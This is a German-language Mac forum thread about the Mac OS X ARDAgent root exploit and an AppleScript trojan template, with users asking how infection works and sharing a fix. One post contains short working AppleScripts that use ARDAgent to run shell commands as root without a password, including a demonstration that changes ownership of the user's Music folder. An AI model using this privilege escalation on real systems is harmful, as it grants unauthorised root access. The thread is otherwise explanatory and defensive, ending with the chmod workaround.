Root Exploit

Hintertür-Trojaner nutzt Lücke in Mac OS X aus

In einem Mac-Hacker-Forum wurde ein Tool entwickelt und verbreitet, das eine bekannte Sicherheitslücke in OS X ausnutzt, berichtet Brian Krebs in seinem Security-Blog der Washington Post. Über den letzte Woche bekannt gewordenen Root-Exploit verschafft sich das "Applescript Trojan horse template" Administratorrechte und nutzt diese, um versteckte Hintertür- und Spionagefunktionen einzurichten.

Genau, find ich auch. Aber zum Glück haben wir noch das Sophos der Firma drauf :)
 
Zuletzt bearbeitet von einem Moderator:
in der Tat, so langsam wird es bitter!
 
Mir geht leider nicht klar hervor, wie der Trojaner das System infiltriert. Durch Sufen auf unseriösen Internetseiten oder durch E-Mails?
 
Einherjar schrieb:
Mir geht leider nicht klar hervor, wie der Trojaner das System infiltriert. Durch Sufen auf unseriösen Internetseiten oder durch E-Mails?
Zum Vergrößern anklicken....

Für den exploit:
Für einen erfolgreichen Angriff ist nicht zwingend der physische Zugriff auf ein System notwendig. Grundsätzlich funktioniert der Exploit auch aus der Ferne, etwa auf einem Server, auf dem ein Anwender ein eingeschränktes Konto mit SSH-Zugriff hat.
 
Einherjar schrieb:
Mir geht leider nicht klar hervor, wie der Trojaner das System infiltriert. Durch Sufen auf unseriösen Internetseiten oder durch E-Mails?
Zum Vergrößern anklicken....

durch integration in ein DMG zur Installation z.B.
 
Verstehe ich das richtig, daß also Webserver angegriffen werden, als Trägermedium quasi, und wenn man die Seiten der Webserver aufruft, dann pflanzt sich das auf dem lokalen System ein?
 
Einherjar schrieb:
Mir geht leider nicht klar hervor, wie der Trojaner das System infiltriert.
Zum Vergrößern anklicken....
Du startest ein nettes Programm, was du irgendwo heruntergeladen hast, und das hat diesen Trojaner mit im Gepäck. Zum installieren des Trojaners ist dank dieser Sicherheitslücke kein root PW notwendig. Er wird also unbemerkt aktiviert...
Dai Zovi said of the Trojan template. "Most people assume that if something is going to do something dangerous, that it will ask you for your password first, but this won't."
Zum Vergrößern anklicken....
Quelle
 
Einherjar schrieb:
Verstehe ich das richtig, daß also Webserver angegriffen werden, als Trägermedium quasi, und wenn man die Seiten der Webserver aufruft, dann pflanzt sich das auf dem lokalen System ein?
Zum Vergrößern anklicken....

meines Wissens bisher das nein!
 
MacMännchen schrieb:
Du startest ein nettes Programm, was du irgendwo heruntergeladen hast, und das hat diesen Trojaner mit im Gepäck. Zum installieren des Trojaners ist dank dieser Sicherheitslücke kein root PW notwendig. Er wird also unbemerkt aktiviert...
Zum Vergrößern anklicken....

...wer einfach irgendwelche programme von irgendwoher installiert und ausführt, ist doch selbst schuld.

....und ganz so simple ist es auch nicht, wenn man ein program startet. "launchd" lässt auch nicht alles zu.
 
Zuletzt bearbeitet:
in2itiv schrieb:
...wer einfach irgendwelche programme von irgendwoher installiert und ausführt, ist doch selbst schuld.
Zum Vergrößern anklicken....
ok, aber das ist wieder eine andere Geschichte ;)

in2itiv schrieb:
....und ganz so simple ist es auch nicht, wenn man ein program startet. "lauchd" lässt auch nicht alles zu.
Zum Vergrößern anklicken....

Der Aufruf des Trojaners könnte z.B. in einem Shell Skript stecken, das mit normalen User-Rechten läuft...
 
in2itiv schrieb:
....und was soll es dann "anrichten"?
Zum Vergrößern anklicken....

nunja was auch immer man übles damit vor hat braucht man bloß einfach in dieses Skript integrieren und gut ist. Genauer werde ich das aber nicht ausführen ;)
 
Danke für die Antworten.
Das impliziert dann auch, daß gefälschte Programmaktualisierungen angeboten werden könnten, die das Trojaner enthalten? Ich denke hier z.b. an gefälschte Crowl-Aktualisierungsmeldungen oder dergleichen.?
 
Tja, dann werde ich jetzt mal ganz behutsam sein. Neue Software brauche ich ja derzeit nicht, und Updates sind auch erst mal nicht so wichtig.

Andererseits: Die berühmte Testzeile im Terminal hat ja nichts Bedenkliches gezeigt.

So, Apple - nun mach mal hin, deine zahlenden Kunden warten …
 
Es wurde hier öfter gefragt, wie denn die Sicherheitslücke ausgenutzt werden kann. Da ich das auch genauer wissen wollte, habe ich mal mit AppleScript ein bisschen herum experimentiert. Herausgekommen sind drei Scripts, die es wohl deutlich machen können.
Das Script "boese aber vergeblich" versucht den Befehl chown auszuführen, den man nur als superuser/root ausführen kann:
Code: 
set theuser to do shell script "whoami"
do shell script "whoami"
do shell script "chown root Users/" & theuser & "/Music"
Logischerweise kommt es zu der Fehlermeldung "Operation not permitted".

Wie schon an anderer Stelle beschrieben, gibt es den Test "whoami", ob die Lücke ausgenutzt werden kann. Das AppleScript dazu:
Code: 
tell application "ARDAgent"
	set theuser to do shell script "whoami"
end tell
display alert theuser
Lautet die Meldung "root", so kann die Lücke ausgenutzt werden.
Dann funktioniert auch das AppleScript "boese":
Code: 
set theuser to do shell script "whoami"
tell application "ARDAgent"
	do shell script "whoami"
	do shell script "chown root Users/" & theuser & "/Music"
end tell
Wie man sieht, ist der Unterschied zum ersten Script gering. Wenn die Ausführung gelingt - man beachte, dass nicht nach einem Passwort gefragt wird - , bekommt der Ordner "Musik" als Eigentümer "root". Beim Versuch diesen nun zu öffnen kommt die Fehlermeldung:'Der Ordner "Musik" konnte nicht geöffnet werden, da Sie nicht über die notwendigen Zugriffsrechte verfügen'.
Um wieder die Herrschaft über die Musik zu bekommen, öffnet man das Informationsfenster (Sharing & Zugriffsrechte), öffnet das Schloss rechts unten, mit "+" links unten fügt man sich selbst als Benutzer wieder zu, wählt sich aus, und trägt sich mit dem Zahnrädchen wieder als Eigentümer ein. Dann sich selbst auch wieder Schreibrechte geben. Zum Schluss kann man "System" mit dem "-" wieder entfernen.

Mit etwas Fantasie kann man sich schon vorstellen, dass mit dieser Sicherheitslücke ziemlich viel Unsinn angestellt werden kann.
 
Zuletzt bearbeitet von einem Moderator:
ich halte es nicht fuer hilfreich, hier lauffaehige scripts zu verlinken die eine ernsthafte Sicherheitsluecke ausnutzen koennen.
 
Habe ein kleines Problem: habe, wie auf Seite 2 ganz oben beschrieben steht, dem ADRAgent die root-Rechte entzogen. Problem: jetzt wirkt der Workaround mit dem Aktivieren der externen Verwaltung nicht mehr, sprich: wenn man das whoami-Script anwendet, spuckt er mir nach wie vor meinen Nutzernamen aus. Hat jemand 'ne Idee, wie man das beheben könnte?
 
Also, nochmal für Blondinen. Ich habe die Entfernte Verwaltung aktiviert (nur für mich als Benutzer) und bei den Optionen dazu keine Häkchen gemacht. Tippe ich im Terminal nun
osascript -e 'tell app "ARDAgent" to do shell script "whoami"';

dann bekomme ich die Meldung "root". Wenn ich den Thread richtig verstanden habe, ist das nicht so gut, oder? Was nun?
 
FrolleinSchmidt schrieb:
dann bekomme ich die Meldung "root". Wenn ich den Thread richtig verstanden habe, ist das nicht so gut, oder? Was nun?
Zum Vergrößern anklicken....

Dann folgendes eintippen:

Code: 
sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

Passwort eingeben (das Passwort kannst du nicht sehen, wenn du es eintippst, eine Eingabe erfolgt aber - ist nur ein Sicherheitsmechanismus unter UNIX, keine Panik ;)) und dann bestätigen.

Dann die von dir genannte Codezeile "whoami" nochmal eingeben, und dann sollte da kein root mehr stehen, sondern dein Benutzername. Wenn dann das böse Ding da kommt, kann es eigentlich nix schlimmes mehr anstellen.

Warnung: Nach der nächsten Rechtereparatur musst du diesen Schritt wiederholen!!
 
Du musst dich einloggen oder registrieren, um hier zu antworten.
Zurück
Oben Unten